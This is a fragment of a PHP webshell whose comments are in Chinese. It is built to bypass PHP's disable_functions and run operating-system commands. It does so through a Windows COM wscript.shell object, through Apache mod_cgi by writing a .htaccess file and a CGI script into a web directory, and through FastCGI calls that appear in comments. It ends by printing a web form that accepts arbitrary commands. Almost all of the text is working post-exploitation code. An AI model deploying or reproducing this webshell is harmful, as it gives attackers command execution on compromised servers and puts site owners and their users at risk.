//        $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1));
//    }
    return $result;
}

//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002));
//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock');
//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000));

/*
 * COM执行: 仅限windows
 * work on:
 * php 5.4.45
 *
 * *******
 * fail:
 * > php 5.5.38
 *
 */

function com_exec($cmd){
    $cmd = "cmd.exe /c ".$cmd;
    $cmd_arr = send_cmd($cmd);

    echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。";

    $wscript = new COM('wscript.shell');
    $wscript->Run($cmd_arr[0]);

    sleep(1);
    return recv_result($cmd_arr[1]);
}

//echo com_exec($_GET['cmd']);

/*
 * Apache mod-cgi: Windows && Linux
 * 需要保证一个web目录可写可访问
 *
 * 注意备份htaccess
 */

function apache_cgi_exec($cmd, $dir='.'){
    echo "由于是系统调用cmd执行后命令，会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。";
    // check
//    if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){
//        return FAILURE;
//    }

    $cmd_arr = send_cmd($cmd);
    if(OS == "Windows") {
        $shell_file = "bye.bat";
        $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks";

        $cmd_arr[0] = escapeshellcmd($cmd_arr[0]);
        $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)";
    } else {
        $shell_file = "1.bylinux";
        $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux";
        $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0];
    }

    write_file('.htaccess', $htaccess);
    write_file($shell_file, $content);

    echo "<img src = '$shell_file' style = 'display:none;'>";
    sleep(1);
    echo recv_result($cmd_arr[1]);
}

//echo apache_cgi_exec($_GET['cmd']);


echo <<<EOF

Disable Function: <br>
$disable_function_str <br><br>

Vulable Function: <br>
$vul_function_str <br><br>

Open Basedir: <br>
$open_basedir <br><br>

<form action="$myscript" method="post">
    execpath: <input type="text" name="bin" value="/bin/bash"><br><br>
    command: <input type="text" name="cmd" value=""><br><br>
    writeable dir: <input type="text" name="path" value=""><br><br>
    <input type="submit" name="submit" value="exec"><br><br>
</form>

EOF;

//echo $_POST["cmd"];


?>